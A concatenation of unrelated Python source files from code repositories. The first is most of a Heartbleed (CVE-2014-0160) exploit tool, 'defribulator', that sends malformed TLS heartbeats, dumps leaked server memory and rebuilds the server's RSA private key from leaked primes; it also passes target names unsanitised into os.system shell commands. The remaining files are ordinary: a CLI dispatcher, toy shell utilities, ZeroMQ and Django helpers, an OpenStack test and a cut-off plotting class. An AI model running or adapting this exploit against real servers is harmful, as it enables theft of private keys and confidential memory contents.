                    print '\nWARNING: ' + targ + ':' + str(opts.port) + ' returned more data than it should - server is vulnerable!'
                if opts.rawoutfile:
                    rawfileOUT.write(pay)
                if opts.extractkey:
                    return pay
                else:
                    return hexdump(pay)
            else:
                print 'Server processed malformed heartbeat, but did not return any extra data.'
        if typ == 21:  # alert record
            print 'Received alert:'
            return hexdump(pay)
        print 'Server returned error, likely not vulnerable'
        return ''
def conn(targ, port):
    """Open a TCP connection to (targ, port) with a 10s timeout.

    Returns the connected socket, or None on any connection error.
    """
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sys.stdout.flush()
        s.settimeout(10)
        #time.sleep(0.2)
        s.connect((targ, port))
        return s
    except Exception as e:
        print "Connection Error! " + str(e)
        return None
def bleed(targ, port):
    """Attack one target: connect opts.num times and collect leaked data.

    Per connection: optionally negotiate STARTTLS/STLS/AUTH TLS for
    plaintext protocols, auto-detect a supported TLS version via
    ClientHello probes, then fire the malformed heartbeat (hit_hb).
    In extract-key mode each leaked chunk is scanned for the server's RSA
    prime and the process exits on success; otherwise the accumulated
    hexdump text is returned (None is returned implicitly on error).
    """
    try:
        res = ''
        firstrun = True
        print '\n##################################################################'
        print 'Connecting to: ' + targ + ':' + str(port) + ', ' + str(opts.num) + ' times'
        for x in range(0, opts.num):
            if x > 0:
                firstrun = False
            # One-time setup for key extraction: fetch the server cert with
            # the openssl CLI and pull out its modulus n.
            if x == 0 and opts.extractkey:
                print "Attempting to extract private key from returned data..."
                if not os.path.exists('./hb-certs'):
                    os.makedirs('./hb-certs')
                print '\nGrabbing public cert from: ' + targ + ':' + str(port) + '\n'
                os.system('echo | openssl s_client -connect ' + targ + ':' + str(port) + ' -showcerts | openssl x509 > hb-certs/sslcert_' + targ + '.pem')
                print '\nExtracting modulus from cert...\n'
                os.system('openssl x509 -pubkey -noout -in hb-certs/sslcert_' + targ + '.pem > hb-certs/sslcert_' + targ + '_pubkey.pem')
                output = os.popen('openssl x509 -in hb-certs/sslcert_' + targ + '.pem -modulus -noout | cut -d= -f2')
                modulus = output.read()
            s = conn(targ, port)
            if not s:
                continue
            # send starttls command if specified as an option or if common smtp/pop3/imap ports are used
            if (opts.starttls) or (port in {25, 587, 110, 143, 21}):
                stls = False
                atls = False
                # check if smtp supports starttls/stls
                if port in {25, 587}:
                    print 'SMTP Port... Checking for STARTTLS Capability...'
                    check = s.recv(1024)
                    s.send("EHLO someone.org\n")
                    sys.stdout.flush()
                    check += s.recv(1024)
                    if opts.verbose:
                        print check
                    if "STARTTLS" in check:
                        opts.starttls = True
                        print "STARTTLS command found"
                    elif "STLS" in check:
                        opts.starttls = True
                        stls = True
                        print "STLS command found"
                    else:
                        print "STARTTLS command NOT found!"
                        print '##################################################################'
                        return
                # check if pop3/imap supports starttls/stls
                elif port in {110, 143}:
                    print 'POP3/IMAP4 Port... Checking for STARTTLS Capability...'
                    check = s.recv(1024)
                    if port == 110:
                        s.send("CAPA\n")
                    if port == 143:
                        s.send("CAPABILITY\n")
                    sys.stdout.flush()
                    check += s.recv(1024)
                    if opts.verbose:
                        print check
                    if "STARTTLS" in check:
                        opts.starttls = True
                        print "STARTTLS command found"
                    elif "STLS" in check:
                        opts.starttls = True
                        stls = True
                        print "STLS command found"
                    else:
                        print "STARTTLS command NOT found!"
                        print '##################################################################'
                        return
                # check if ftp supports auth tls/starttls
                elif port in {21}:
                    print 'FTP Port... Checking for AUTH TLS Capability...'
                    check = s.recv(1024)
                    s.send("FEAT\n")
                    sys.stdout.flush()
                    check += s.recv(1024)
                    if opts.verbose:
                        print check
                    if "STARTTLS" in check:
                        opts.starttls = True
                        print "STARTTLS command found"
                    elif "AUTH TLS" in check:
                        opts.starttls = True
                        atls = True
                        print "AUTH TLS command found"
                    else:
                        print "STARTTLS command NOT found!"
                        print '##################################################################'
                        return
                # send appropriate tls command if supported
                if opts.starttls:
                    sys.stdout.flush()
                    if stls:
                        print 'Sending STLS Command...'
                        s.send("STLS\n")
                    elif atls:
                        print 'Sending AUTH TLS Command...'
                        s.send("AUTH TLS\n")
                    else:
                        print 'Sending STARTTLS Command...'
                        s.send("STARTTLS\n")
                    if opts.verbose:
                        print 'Waiting for reply...'
                    sys.stdout.flush()
                    rcv_tls_record(s)
            # Probe TLS versions until the server answers with a ServerHello
            # (handshake record, type 22, message type 0x0E = ServerHelloDone).
            supported = False
            for num,tlsver in tls_versions.items():
                if firstrun:
                    print 'Sending Client Hello for {}'.format(tlsver)
                s.send(hex2bin(build_client_hello(num)))
                if opts.verbose:
                    print 'Waiting for Server Hello...'
                while True:
                    typ,ver,message = rcv_tls_record(s)
                    if not typ:
                        if opts.verbose:
                            print 'Server closed connection without sending ServerHello for {}'.format(tlsver)
                        # Reconnect before trying the next version.
                        s.close()
                        s = conn(targ, port)
                        break
                    if typ == 22 and ord(message[0]) == 0x0E:
                        if firstrun:
                            print 'Received Server Hello for {}'.format(tlsver)
                        supported = True
                        break
                if supported: break
            if not supported:
                print '\nError! No TLS versions supported!'
                print '##################################################################'
                return
            if opts.verbose:
                print '\nSending heartbeat request...'
            sys.stdout.flush()
            keyfound = False
            if opts.extractkey:
                res = hit_hb(s, targ, firstrun, supported)
                if res == '':
                    continue
                keyfound = extractkey(targ, res, modulus)
            else:
                res += hit_hb(s, targ, firstrun, supported)
            s.close()
            if keyfound:
                # Private key recovered -- nothing more to do.
                sys.exit(0)
            else:
                sys.stdout.write('\rPlease wait... connection attempt ' + str(x+1) + ' of ' + str(opts.num))
                sys.stdout.flush()
        print '\n##################################################################'
        print
        return res
    except Exception as e:
        print "Error! " + str(e)
        print '##################################################################'
        print
def extractkey(host, chunk, modulus):
    """Scan a leaked memory chunk for a prime factor of the server modulus.

    Every keysize-byte window of `chunk` is read as a little-endian integer;
    if it is prime and divides n, the full RSA private key (with CRT
    parameters) is rebuilt, printed PEM-encoded, and the chunk is dumped to
    disk. Returns True when a key was recovered, False otherwise.
    """
    #print "\nChecking for private key...\n"
    n = int (modulus, 16)
    # Bytes per prime: n.bit_length()/8 bytes for n, halved for p or q.
    keysize = n.bit_length() / 16
    for offset in xrange (0, len (chunk) - keysize):
        # Reverse the window's bytes: the primes sit in memory little-endian.
        p = long (''.join (["%02x" % ord (chunk[x]) for x in xrange (offset + keysize - 1, offset - 1, -1)]).strip(), 16)
        if gmpy.is_prime (p) and p != n and n % p == 0:
            if opts.verbose:
                print '\n\nFound prime: ' + str(p)
            # Standard RSA key reconstruction from one prime factor.
            e = 65537
            q = n / p
            phi = (p - 1) * (q - 1)
            d = gmpy.invert (e, phi)
            dp = d % (p - 1)
            dq = d % (q - 1)
            qinv = gmpy.invert (q, p)
            # PKCS#1 RSAPrivateKey: version, n, e, d, p, q, dp, dq, qinv.
            seq = Sequence()
            for x in [0, n, e, d, p, q, dp, dq, qinv]:
                seq.setComponentByPosition (len (seq), Integer (x))
            print "\n\n-----BEGIN RSA PRIVATE KEY-----\n%s-----END RSA PRIVATE KEY-----\n\n" % base64.encodestring(encoder.encode (seq))
            privkeydump = open("hb-certs/privkey_" + host + ".dmp", "a")
            privkeydump.write(chunk)
            return True
    else:
        # for/else: loop exhausted without finding a factor.
        return False
def main():
	"""Entry point: run the heartbleed test against one target or a target file.

	Relies on module-level option parsing (opts/args) done at import time.
	"""
	print "\ndefribulator v1.16"
	print "A tool to test and exploit the TLS heartbeat vulnerability aka heartbleed (CVE-2014-0160)"
	allresults = ''
	# if a file is specified, loop through file
	if opts.filein:
		fileIN = open(opts.filein, "r")
		for line in fileIN:
			# Each line is either "host" or "host:port".
			targetinfo = line.strip().split(":")
			if len(targetinfo) > 1:
				allresults = bleed(targetinfo[0], int(targetinfo[1]))
			else:
				allresults = bleed(targetinfo[0], opts.port)
			if allresults and (not opts.donotdisplay):
				print '%s' % (allresults)
		fileIN.close()
	else:
		# Single-target mode: host comes from the positional arguments.
		if len(args) < 1:
			options.print_help()
			return
		allresults = bleed(args[0], opts.port)
		if allresults and (not opts.donotdisplay):
			print '%s' % (allresults)
	print
	# Close optional dump files opened during option handling.
	if opts.rawoutfile:
		rawfileOUT.close()
	if opts.asciioutfile:
		asciifileOUT.close()
# Script entry point.
if __name__ == '__main__':
	main()
| injcristianrojas/heartbleed-example | heartbleed.py | Python | mit | 17,715 |
# -*- coding: utf-8 -*-
"""
eve.methods
~~~~~~~~~~~
This package implements the HTTP methods supported by Eve.
:copyright: (c) 2015 by Nicola Iarocci.
:license: BSD, see LICENSE for more details.
"""
# flake8: noqa
from eve.methods.get import get, getitem
from eve.methods.post import post
from eve.methods.patch import patch
from eve.methods.put import put
from eve.methods.delete import delete, deleteitem
| eduardomb/eve | eve/methods/__init__.py | Python | bsd-3-clause | 432 |
"""
The main script
"""
import argparse
import summaryrank.features
import summaryrank.importers
import summaryrank.tools
# Help-text template; the three {} slots are filled with the formatted
# command listings built in the __main__ block below.
DESCRIPTION = '''
SummaryRank is a set of tools that help producing machine-learned
summary/sentence rankers. It supports a wide range of functions such
as generating judgments in trec_eval format or creating feature
vectors in the SVMLight format.
corpora tools:
{}
representations and features:
{}
commands:
{}
'''
# (command name, handler) pairs for corpus import subcommands.
IMPORTER_FUNCTIONS = [
    ("import_webap", summaryrank.importers.import_webap),
    ("import_trec_novelty", summaryrank.importers.import_trec_novelty),
    ("import_mobileclick", summaryrank.importers.import_mobileclick),
]
# (command name, handler) pairs for feature/representation generation.
FEATURE_FUNCTIONS = [
    ("gen_term", summaryrank.features.gen_term),
    ("gen_freqstats", summaryrank.features.gen_freqstats),
    ("gen_esa", summaryrank.features.gen_esa),
    ("gen_tagme", summaryrank.features.gen_tagme),
    ("extract", summaryrank.features.extract),
    ("contextualize", summaryrank.features.contextualize),
]
# (command name, handler) pairs for general data-manipulation commands.
GENERAL_FUNCTIONS = [
    ("describe", summaryrank.tools.describe),
    ("cut", summaryrank.tools.cut),
    ("join", summaryrank.tools.join),
    ("shuffle", summaryrank.tools.shuffle),
    ("split", summaryrank.tools.split),
    ("normalize", summaryrank.tools.normalize),
]
def _make_command_list(functions):
""" Prepare a formatted list of commands. """
return [' {:24}{}\n'.format(name, func.__doc__.strip().splitlines()[0])
for name, func in functions]
# Runs both as `python -m summaryrank` (__name__ == 'summaryrank.__main__')
# and as a direct script (__name__ == '__main__').
if __name__.endswith('__main__'):
    # Build the formatted command listings injected into DESCRIPTION.
    importer_commands = ''.join(_make_command_list(IMPORTER_FUNCTIONS))
    feature_commands = ''.join(_make_command_list(FEATURE_FUNCTIONS))
    general_commands = ''.join(_make_command_list(GENERAL_FUNCTIONS))
    parser = argparse.ArgumentParser(
        prog='summaryrank',
        formatter_class=argparse.RawDescriptionHelpFormatter,
        usage='%(prog)s [options..] command [args..]',
        add_help=False,
        description=DESCRIPTION.format(
            importer_commands, feature_commands, general_commands)
    )
    # The subcommand name plus everything after it; dispatched manually below.
    parser.add_argument('command', nargs='?', help=argparse.SUPPRESS)
    parser.add_argument('argv', nargs=argparse.REMAINDER, help=argparse.SUPPRESS)
    args = parser.parse_args()
    # Merge all command tables into one name -> handler mapping.
    commands = dict()
    commands.update(IMPORTER_FUNCTIONS)
    commands.update(FEATURE_FUNCTIONS)
    commands.update(GENERAL_FUNCTIONS)
    if args.command in commands:
        commands[args.command](args.argv)
    else:
        if args.command is not None:
            parser.error("invalid command '{}'".format(args.command))
        else:
            parser.print_help()
| rmit-ir/SummaryRank | summaryrank/__main__.py | Python | mit | 2,623 |
import os
import sys
import shutil
import tools
import subprocess
import helpers
sys.path.insert(0,"../..")
def list_to_str(l):
    """Join the strings in *l* with newlines; return "" for an empty list."""
    # str.join is linear and already covers the empty and single-element
    # cases the original handled manually (and quadratically via +=).
    return "\n".join(l)
def test():
    """Trivial smoke-test command: prints the word "test"."""
    print "test"
def pwd():
    """Return the absolute path of the current working directory."""
    current_directory = os.getcwd()
    return current_directory
def cd(param):
    """Change the process working directory to *param*, printing a notice."""
    #print "arg:"+arg
    #print "param:"+param
    #print(d[0])
    #print len(d)
    print "change current directory to "+param
    os.chdir(param)
def ls(*d):
    """List directory entries, one per line.

    With no argument lists the current directory; otherwise lists d[0].
    """
    target = d[0] if d else os.getcwd()
    return list_to_str(os.listdir(target))
def cat(param):
    """Return the entire contents of the file *param* as one string.

    Raises Exception if the file does not exist.
    """
    if not os.path.exists(param):
        raise Exception("No such file exists!")
    # Context manager closes the handle promptly (the original leaked it),
    # and read() is equivalent to the manual readlines() concatenation.
    with open(param) as f:
        return f.read()
def rm(path):
    """Remove a file, a directory tree, or wildcard-matching files.

    A '*' in *path* is treated as a shell-style glob on the basename; every
    matching file inside the path's directory is removed.
    """
    if '*' in path:
        import fnmatch
        path_dir = os.path.dirname(path) or '.'
        pattern = os.path.basename(path)
        for fn in os.listdir(path_dir):
            # fnmatch gives shell glob semantics (the original compiled the
            # pattern as a regex, where '*' means something different), and
            # the file is removed from its own directory (the original
            # called os.remove(fn) relative to the current directory).
            if fnmatch.fnmatch(fn, pattern):
                os.remove(os.path.join(path_dir, fn))
        return
    if os.path.isdir(path):
        shutil.rmtree(path)
    else:
        os.remove(path)
def grep(match, source):
    """Return all lines of *source* containing *match*, newline-joined."""
    # str.join over a generator replaces the hand-rolled accumulator helper;
    # output is identical ("" when nothing matches).
    return "\n".join(s for s in source.split('\n') if match in s)
def redirect(source, destination):
    """Write the string *source* to file *destination*, overwriting it."""
    # Context manager guarantees the data is flushed and the handle closed;
    # the original left the file object open.
    with open(destination, "w") as f:
        f.write(source)
def wc(s):
    """Return the number of newline-delimited segments in *s*."""
    # Equivalent to len(s.split('\n')): one more than the newline count.
    return s.count('\n') + 1
def mkdir(path):
    """Create directory *path* and return a confirmation message.

    Raises Exception if something already exists at *path*.
    """
    if not os.path.exists(path):
        os.mkdir(path)
        return "Directory " + path + " created!"
    raise Exception("Directory already existed!")
def touch(fn):
    """Create an empty file *fn* and return a confirmation message.

    Raises Exception if the file already exists.
    """
    if os.path.exists(fn):
        raise Exception("file " + fn + " already exist!")
    # 'with' actually closes the handle; the original wrote `f.close`
    # without calling it, so the file was only closed by refcounting.
    with open(fn, "w"):
        pass
    return "File created: " + fn
def cp(source, destination):
    """Copy a file, or recursively copy a directory tree.

    Raises Exception if *source* is missing, or if a directory copy targets
    an existing regular file.
    """
    if not os.path.exists(source):
        raise Exception("No such file exists!")
    if os.path.isfile(source):
        shutil.copy(source, destination)
        return
    # Directory copy.
    if os.path.exists(destination) and os.path.isfile(destination):
        raise Exception("File " + destination + " exists, please specify another directory name for dir copy!")
    if not os.path.exists(destination):
        mkdir(destination)
    for entry in os.listdir(source):
        # os.path.join works on every platform; the original hard-coded the
        # Windows '\\' separator, breaking the recursion on POSIX systems.
        src_path = os.path.join(source, entry)
        if os.path.isdir(src_path):
            cp(src_path, os.path.join(destination, entry))
        else:
            shutil.copy(src_path, destination)
def mv(source, destination):
    """Move (or rename) *source* to *destination* via shutil.move."""
    shutil.move(source,destination)
def sh(fn):
    """Run a script file: feed each stripped line to tools.parse()."""
    # Context manager closes the script file (the original leaked the handle).
    with open(fn, "r") as f:
        for l in f:
            tools.parse(l.strip())
def echo(*ss):
    """Concatenate the arguments, stripping double quotes.

    Each argument is followed by a single space (including the last one),
    matching shell-style echo output used elsewhere in this module.
    """
    return "".join(word.replace('"', '') + " " for word in ss)
def diff(fn1, fn2):
    """Compare two files line by line and return a newline-joined report.

    One report line is produced per differing line number; when the files
    have different lengths, the extra lines of the longer file are reported
    with an empty column for the shorter one.
    """
    ans = []
    with open(fn1, "r") as f1:
        list1 = f1.readlines()
    with open(fn2, "r") as f2:
        list2 = f2.readlines()
    min_len = min(len(list1), len(list2))
    # Compare the overlapping prefix.
    for i in range(min_len):
        s1 = list1[i]
        s2 = list2[i]
        if s1 != s2:
            ans.append("line " + str(i + 1) + ": " + s1 + "\t" + s2)
    # Report the tail of whichever file is longer.  (The original always
    # indexed list1 here, raising IndexError whenever fn2 was the longer
    # file, and its else-branch padding never triggered correctly.)
    longer = list1 if len(list1) >= len(list2) else list2
    for i in range(min_len, len(longer)):
        s = longer[i]
        if longer is list1:
            ans.append("line " + str(i + 1) + ": " + s + "\t")
        else:
            ans.append("line " + str(i + 1) + ": " + "\t" + s)
    return "\n".join(ans)
def read(*ss):
    """Prompt with the given words (double quotes stripped) and wait for input.

    NOTE(review): uses the Python 2 builtin raw_input; under Python 3 this
    would need to be input().
    """
    ans=""
    for s in ss:
        ans+=s.replace('"','')+" "
    raw_input(ans)
def call(*p):
    """Run the given words as a single shell command line via os.system."""
    command_line = "".join(word + " " for word in p)
    os.system(command_line)
def findinfile(p, d=None):
    """Recursively search directory *d* for text files whose content contains *p*.

    Returns the matching absolute paths, one per line.  *d* defaults to the
    current working directory at call time; the original evaluated
    os.getcwd() once at import time, freezing a stale default.
    """
    if d is None:
        d = os.getcwd()
    ans = ""
    for f in os.listdir(d):
        # os.path.join is portable; the original hard-coded '\\'.
        absf = os.path.join(d, f)
        if os.path.isdir(absf):
            ans = ans + findinfile(p, absf)
        else:
            if helpers.istext(absf):
                # Record the path on the first matching line, then stop;
                # 'with' closes the handle the original leaked.
                with open(absf, 'r') as handle:
                    for s in handle:
                        if p in s:
                            ans += absf + "\n"
                            break
    return ans
| log4leo/Shell4Win | src/utilities.py | Python | mit | 4,412 |
import asyncio
import aiozmq
import zmq
async def monitor_stream(stream):
    """Print transport events from *stream* until its monitor is closed."""
    try:
        while True:
            event = await stream.read_event()
            print(event)
    except aiozmq.ZmqStreamClosed:
        # The stream (or its monitor) was closed; stop monitoring quietly.
        pass
async def go():
    """Round-trip ten messages between a DEALER and a ROUTER socket while
    printing transport events from the DEALER's monitor."""
    router = await aiozmq.create_zmq_stream(zmq.ROUTER, bind="tcp://127.0.0.1:*")
    # Use whichever ephemeral address the wildcard bind resolved to.
    addr = list(router.transport.bindings())[0]
    dealer = await aiozmq.create_zmq_stream(zmq.DEALER)
    # Start watching transport events (connect, disconnect, ...) concurrently.
    await dealer.transport.enable_monitor()
    asyncio.Task(monitor_stream(dealer))
    await dealer.transport.connect(addr)
    for i in range(10):
        msg = (b"data", b"ask", str(i).encode("utf-8"))
        dealer.write(msg)
        data = await router.read()
        # Echo the frames straight back to the dealer.
        router.write(data)
        answer = await dealer.read()
        print(answer)
    router.close()
    dealer.close()
def main():
    """Script entry point: run the demo coroutine to completion."""
    asyncio.run(go())
    print("DONE")
if __name__ == "__main__":
main()
| aio-libs/aiozmq | examples/stream_monitor.py | Python | bsd-2-clause | 919 |
# Copyright 2012 Nebula, Inc.
# Copyright 2013 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from nova.tests.integrated.v3 import test_servers
class AdminPasswordJsonTest(test_servers.ServersSampleBase):
    """API sample test for the os-admin-password server action extension."""
    extension_name = 'os-admin-password'
    def test_server_password(self):
        """Boot a server and exercise the change-password action sample."""
        uuid = self._post_server()
        subs = {"password": "foo"}
        response = self._do_post('servers/%s/action' % uuid,
                                 'admin-password-change-password',
                                 subs)
        # A successful password change returns 204 No Content with an
        # empty body.
        self.assertEqual(response.status, 204)
        self.assertEqual(response.read(), "")
| afrolov1/nova | nova/tests/integrated/v3/test_admin_password.py | Python | apache-2.0 | 1,153 |
#!/usr/bin/env python
# Output formatters (for printing info and data files)
#
# Copyright (C) 2014 Peter Wu <peter@lekensteyn.nl>
import math
from defs import info, data
# Python 2.7 compatibility
# Under Python 2, bytes and str are the same type, so b'' == '' is True and
# iterating a byte string yields 1-char strings that must be mapped through
# ord(); under Python 3 iterating bytes already yields ints, so plain iter()
# suffices.  Either way, iterbytes(bs) yields integer byte values.
if b'' == '':
    import functools, itertools
    iterbytes = functools.partial(itertools.imap, ord)
else:
    iterbytes = iter
class BasePrinter(object):
    """Prints the info, data header or data in verbose form."""
    def __init__(self, filename):
        # No per-file state needed; *filename* is accepted so all printers
        # share the same constructor signature.
        pass
    def print_info(self, t):
        # Render an info record using the module-level `info` definitions.
        print_namedtuple(t, info)
    def print_data_header(self, t):
        print_namedtuple(t, data)
    def print_data(self, t, date):
        # *date* is ignored in verbose form; subclasses prepend it per row.
        print_namedtuple(t, data)
class RawPrinter(BasePrinter):
    """Prints raw bytes in hex form, possibly with headers."""
    def print_data(self, t, date):
        # Convert interpreted numbers back to bytes...
        all_bs = [data.pack_as_bytes(name, getattr(t, name))
                  for name in data.names]
        # Convert bytes to hex and print them, one hex group per field,
        # prefixed with the record's date.
        print(date + ' ' + ' '.join(
            ''.join('{0:02x}'.format(b) for b in iterbytes(bs))
            for bs in all_bs))
class CSVPrinter(BasePrinter):
    """Prints data rows separated by a configurable separator (CSV-style)."""
    def __init__(self, filename, separator=','):
        self.separator = separator
        # The column header is emitted lazily, just before the first row.
        self.printed_header = False
    def print_data_header(self, t):
        # Header handling happens in print_data(); nothing to do here.
        pass
    def print_data(self, t, date):
        if not self.printed_header:
            header_fields = ["timestamp"] + data.names
            print(self.separator.join(header_fields))
            self.printed_header = True
        row = ('{1}{0}{2:5.1f}{0}{3:5.3f}{0}{4:5.3f}'
               .format(self.separator, date, *t))
        print(row)
class EffectivePowerPrinter(BasePrinter):
    """
    Prints the effective power in Watt, computed from voltage, current and the
    power factor.
    """
    def __init__(self, filename, separator=','):
        self.separator = separator
    def print_data_header(self, t):
        # This output format has no separate header row.
        pass
    def print_data(self, t, date):
        # Effective (real) power: P = V * I * power factor.
        watts = t.voltage * t.current * t.power_factor
        print(date + self.separator + '{:.1f}'.format(watts))
class ApparentPowerPrinter(BasePrinter):
    """Prints the calculated apparent power in VA."""
    def __init__(self, filename, separator=','):
        self.separator = separator
    def print_data_header(self, t):
        # This output format has no separate header row.
        pass
    def print_data(self, t, date):
        # Apparent power: S = V * I (no power factor applied).
        volt_amperes = t.voltage * t.current
        print(date + self.separator + '{:.1f}'.format(volt_amperes))
def round_up(n, multiple):
    """Round *n* up to the next multiple of *multiple*."""
    quotient = math.ceil(1.0 * n / multiple)
    return int(quotient * multiple)
def print_namedtuple(t, formatter):
    """Print one "name  value" row per field of namedtuple *t*.

    Values are passed through formatter.unitify(); bytes values are shown
    via repr() so they stay displayable.
    """
    # Align at columns of four chars with at least two spaces as separator
    longest = max(len(field) for field in t._fields)
    width = round_up(longest + 2, 4)
    row_format = '{0:' + str(width) + '}{1}'
    for name, value in zip(t._fields, t):
        if isinstance(value, bytes):
            value = repr(value)
        print(row_format.format(name, formatter.unitify(name, value)))
| Lekensteyn/el4000 | printers.py | Python | mit | 3,032 |
from django.core.urlresolvers import reverse
import django.http
import django.utils.simplejson as json
import functools
def make_url(request, reversible):
    """Return an absolute URL for the reversible view name on this request's host."""
    return request.build_absolute_uri(reverse(reversible))
def json_output(func):
    """Decorator: serialize the wrapped view's return value as a JSON HttpResponse."""
    @functools.wraps(func)
    def wrapper(*args, **kwargs):
        output = func(*args, **kwargs)
        return django.http.HttpResponse(json.dumps(output),
                                        content_type="application/json")
    return wrapper
| ukch/online_sabacc | src/sabacc/api/viewhelpers.py | Python | gpl-3.0 | 494 |
from textwrap import wrap
import matplotlib.gridspec as gridspec
import matplotlib.pyplot as plt
import numpy as np
from flask import current_app
from flask_babel import gettext
from netCDF4 import Dataset, chartostring
import plotting.utils as utils
from plotting.plotter import Plotter
class Class4Plotter(Plotter):
    """Plots model/observation/climatology profiles for class4 evaluation points."""
    def __init__(self, dataset_name: str, query: str, **kwargs):
        # Identifies this plot type to the base Plotter dispatch.
        self.plottype: str = "class4"
        super(Class4Plotter, self).__init__(dataset_name, query, **kwargs)
    def parse_query(self, query):
        """Extract class4-specific options (points, forecast, error mode, models)."""
        super(Class4Plotter, self).parse_query(query)
        class4 = query.get("class4id")
        if isinstance(class4, str):
            class4 = class4.split(",")
        # Each id is "<class4 file id>_<point index>"; split from the right
        # so underscores inside the file id survive.
        self.class4 = np.array([c.rsplit("_", 1) for c in class4])
        self.forecast = query.get("forecast")
        # A missing "climatology" key defaults to showing the climatology.
        self.climatology = query.get("climatology") is None or bool(
            query.get("climatology")
        )
        self.error = query.get("error")
        models = query.get("models")
        if models is None:
            models = []
        self.models = models
    def load_data(self):
        """Read point metadata and profiles from the class4 netCDF files."""
        indices = self.class4[:, 1].astype(int)
        # Expecting specific class4 ID format: "class4_YYYMMDD_*.nc"
        with Dataset(
            current_app.config["CLASS4_FNAME_PATTERN"]
            % (self.class4[0][0][7:11], self.class4[0][0]),
            "r",
        ) as ds:
            self.latitude = ds["latitude"][indices]
            self.longitude = ds["longitude"][indices]
            self.ids = list(map(str.strip, chartostring(ds["id"][indices])))
            self.variables = list(map(str.strip, chartostring(ds["varname"][:])))
            self.variable_units = list(map(str.strip, chartostring(ds["unitname"][:])))
            # Collect per-point (variable x depth) profiles.
            forecast_data = []
            observed_data = []
            climatology_data = []
            depths = []
            for i in indices:
                f_data = []
                o_data = []
                c_data = []
                for j in range(0, len(self.variables)):
                    # "best" uses the best-estimate field; otherwise the
                    # requested forecast lead index.
                    if self.forecast == "best":
                        f_data.append(ds["best_estimate"][i, j, :])
                    else:
                        f_data.append(ds["forecast"][i, j, int(self.forecast), :])
                    o_data.append(ds["observation"][i, j, :])
                    c_data.append(ds["climatology"][i, j, :])
                forecast_data.append(np.ma.vstack(f_data))
                observed_data.append(np.ma.vstack(o_data))
                climatology_data.append(np.ma.vstack(c_data))
                depths.append(ds["depth"][i, :])
            self.depth_unit = ds["depth"].units
        self.forecast_data = np.ma.array(forecast_data)
        self.observed_data = np.ma.array(observed_data)
        self.climatology_data = np.ma.array(climatology_data)
        self.depths = np.ma.vstack(depths)
        # Best-estimate profiles from any additional comparison models.
        additional_model_data = []
        additional_model_names = []
        for m in self.models:
            additional_model_names.append(m.split("_")[2])
            # Expecting specific class4 ID format: "class4_YYYMMDD_*.nc"
            with Dataset(
                current_app.config["CLASS4_FNAME_PATTERN"] % (m[7:11], m), "r"
            ) as ds:
                m_data = []
                for i in indices:
                    data = []
                    for j in range(0, len(self.variables)):
                        data.append(ds["best_estimate"][i, j, :])
                    m_data.append(np.ma.vstack(data))
                additional_model_data.append(np.ma.array(m_data))
        self.additional_model_data = np.ma.array(additional_model_data)
        self.additional_model_names = additional_model_names
    def csv(self):
        """Export the loaded profiles as CSV rows via the base-class writer."""
        header = []
        columns = ["ID", "Latitude", "Longitude", "Depth"]
        for v in self.variables:
            columns.extend(["%s Model" % v, "%s Observed" % v, "%s Climatology" % v])
        data = []
        for p_idx in range(0, len(self.ids)):
            for idx in range(0, len(self.depths[p_idx])):
                # Skip depths with no observation at all for this point.
                if self.observed_data[p_idx, :, idx].mask.all():
                    continue
                entry = [
                    self.ids[p_idx],
                    "%0.4f" % self.latitude[p_idx],
                    "%0.4f" % self.longitude[p_idx],
                    "%0.1f" % self.depths[p_idx][idx],
                ]
                for v in range(0, len(self.variables)):
                    entry.extend(
                        [
                            "%0.1f" % self.forecast_data[p_idx, v, idx],
                            "%0.1f" % self.observed_data[p_idx, v, idx],
                            "%0.1f" % self.climatology_data[p_idx, v, idx],
                        ]
                    )
                data.append(entry)
        return super(Class4Plotter, self).csv(header, columns, data)
    def plot(self):
        """Render the profile (and optional map) figure and hand it to the base class."""
        figuresize = list(map(float, self.size.split("x")))
        fig = plt.figure(figsize=figuresize, dpi=self.dpi)
        width = len(self.variables)
        if self.showmap:
            width += 1  # Shift graphs to the right
        gs = gridspec.GridSpec(2, width)
        subplot = 0
        # Render point location
        if self.showmap:
            plt.subplot(gs[0, subplot])
            subplot += 1
            utils.point_plot(np.array([self.latitude, self.longitude]))
            if len(self.ids) > 1:
                plt.legend(self.ids, loc="best")
        plot_label = ""
        giops_name = "GIOPS"
        # One column of axes per variable, all points overlaid.
        for idx, v in enumerate(self.variables):
            plt.subplot(gs[:, subplot])
            subplot += 1
            handles = []
            legend = []
            for i in range(0, len(self.forecast_data)):
                id_label = f"{self.ids[i]} " if len(self.ids) > 1 else ""
                # Use markers when there are too few observations for a line.
                form = "-"
                if self.observed_data[i, idx, :].count() < 3:
                    form = "o-"
                if self.error in ["climatology", "observation"]:
                    # Error mode: plot differences against the reference.
                    if self.error == "climatology":
                        plot_label = gettext("Error wrt Climatology")
                        handles.append(
                            plt.plot(
                                self.observed_data[i, idx, :]
                                - self.climatology_data[i, idx, :],
                                self.depths[i],
                                form,
                            )
                        )
                        legend.append(f"{id_label} {gettext('Observed')}")
                        data = self.climatology_data
                    else:
                        plot_label = gettext("Error wrt Observation")
                        data = self.observed_data
                    handles.append(
                        plt.plot(
                            self.forecast_data[i, idx, :] - data[i, idx, :],
                            self.depths[i],
                            form,
                        )
                    )
                    legend.append(f"{id_label} {giops_name}")
                    for j, model_name in enumerate(self.additional_model_names):
                        handles.append(
                            plt.plot(
                                self.additional_model_data[j, i, idx, :]
                                - data[i, idx, :],
                                self.depths[i],
                                form,
                            )
                        )
                        legend.append(f"{id_label} {model_name}")
                    if self.error == "observation" and self.climatology:
                        handles.append(
                            plt.plot(
                                self.climatology_data[i, idx, :]
                                - self.observed_data[i, idx, :],
                                self.depths[i],
                                form,
                            )
                        )
                        legend.append(f"{id_label} {gettext('Climatology')}")
                    # Symmetric x-limits so zero error sits in the middle.
                    lim = np.abs(plt.xlim()).max()
                    plt.xlim([-lim, lim])
                else:
                    # Absolute-value mode: plot the raw profiles.
                    plot_label = gettext("Class 4")
                    handles.append(
                        plt.plot(self.observed_data[i, idx, :], self.depths[i], form)
                    )
                    legend.append("%s %s" % (id_label, gettext("Observed")))
                    handles.append(
